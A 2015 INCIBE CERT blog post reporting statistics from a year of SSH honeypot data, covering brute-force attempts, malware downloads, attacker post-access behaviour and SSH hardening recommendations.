Home / Blog / SSH honeypot for the detection of security incidents (II)

SSH honeypot for the detection of security incidents (II)

Posted on 01/13/2015, by Francisco J. Rodríguez (INCIBE)
SSH honeypot for the detection of security incidents (II)

In the previous "SSH honeypot for the detection of security incidents" [ES] article we looked at a particular case of an attacker gaining access to Honeypot that, unlike others, managed to download a list of users and valid passwords for an SSH access to infringed devices such as routers or iPhones.

But it hasn’t been the only registered access in the deployed SSH honeypots, and in this article we want to carry out an analysis of the data retrieved during 2014.

Analysis and Geolocation of attacks

We consider to be a possible attack any connection made on port 22 of our honeypots, given that the SSH services haven’t been published and every activity carried out on them will be considered suspicious.

After carrying out an analysis of the registered data, the following results are achieved:

  • Over 30,000 connections on the exposed SSH services have been registered.
  • The existence of IP ranges that carry out the same type of attack has been observed.
  • Almost 2000 IP addresses from 72 possibly different attacking countries.

- Top 20 origins of possible attacks (By countries) -

- Representación Geográfica del origen de los posibles ataques (por coordenadas) -

Detection of IP addresses on reputation lists

It can be seen that 56% of the IP addresses haven’t been detected in the reputation lists consulted at the time of carrying out the analysis.

- Detection of the origin of attacks in lP reputation lists -

Types of attacks

The attacks received in our honeypots can be classified in the following types:

- Top 20 user/password combinations -

- Statistics of obtained and denied accesses -

  • Brute force dictionary attacks: Those that intend on accessing the SSH via the use of user and password combinations in an automatic way. Over 100,000 user and password combinations have been registered, of which 30% are a unique combination. 9% of attackers achieve their objective. This percentage varies depending on the number of valid user and password combinations to access our honeypot and the number of permitted attempts before banning the IP.
  • Malware download: These are automated attacks that via wget or SFTP have carried out the download of malware in an SSH service. It has been observed that many attackers when gaining access have verified that the SSH has an SFTP. If they have no SFTP they don’t continue with the attack, as they suspect that it may be a Honeypot. Over 30000 samples have been downloaded and we’ve obtained the following conclusions:
    • A total of 330 unique attackers have downloaded samples of malware. Amongst the downloaded samples, scripts, executable ELFs and uncompiled exploits stand out.
    • A great part of the analysed samples correspond to the same type of malware, but with small variations, producing a different hash. In relation to this point, see the "Variations of malware" article published previously.
    • There are samples that are not detected by the antivirus engines at the time of the download.
    • The origins of the malware downloads used by attackers aren’t detected by the IP and URL reputation lists. In every case, the malware distribution IPs are of Asian origin.

Proxy SSH

Attacks that use our honeypot as proxy to obtain earnings by pay per click have been detected. Once the attacker gains access, he has access to hundreds of pages with the objective of increasing his income.

Other cases

In this section we highlight those attackers that:

  • Carry out port scans.
  • Manage to authenticate and investigate the contents of the SSH server, without carrying out any malicious activity.
  • Facilitate valid credentials for infringed servers: see "HoneyPot SSH in the detection of security incidents" article.
  • Non-authenticated attacks for the download and execution of malware to include them in botnets.

Executed commands

The number of executed commands, both introduced directly in the terminal and executed via script, surpass the 3 million mark, of which 1% are a unique command. Of the executed commands, we highlight the following:

  • Elimination of other malware that is installed in the machine and its own installation.
  • Execution of commands to prove that the attacker is in a honeypot.
  • Elimination of proof of the attack (elimination of history, cleaning of logs…).
  • Halting firewalls.
  • Downloads via SFTP or wget.
  • Malware execution that turns the machine into a bot.

Conclusions and recommendations

Once the results have been analysed, we reach the conclusion of the great number of attacks that our services are exposed to on Internet and the importance of securing them to avoid them from being attacked as much as possible.

The use of honeypot helps us to detect new attackers, new patterns and attack tendencies, creating IPS reputation lists for our knowledge base, along with the detection of new samples of malware that will subsequently be analysed. All this information will help us in our task of strengthening our services and obtaining intelligence.

From the Security and Industry CERT operated by INCIBE we make the following recommendations for the securitization of our SSH services:

  • Change the default SSH port.
  • Not enable the authentication with root.
  • Implement means against attacks with brute force, such as fail2ban.
  • Use the Protocol 2 version.
  • Use strong passwords.
  • Use host.allow and host.deny to specify from which address the access is going to be permitted and from which one it isn’t.

Use Iptables to block the access of IP addresses that have participated in attacks on the SSH service, obtained from IP reputation lists such as blocklist.de and openbl.org.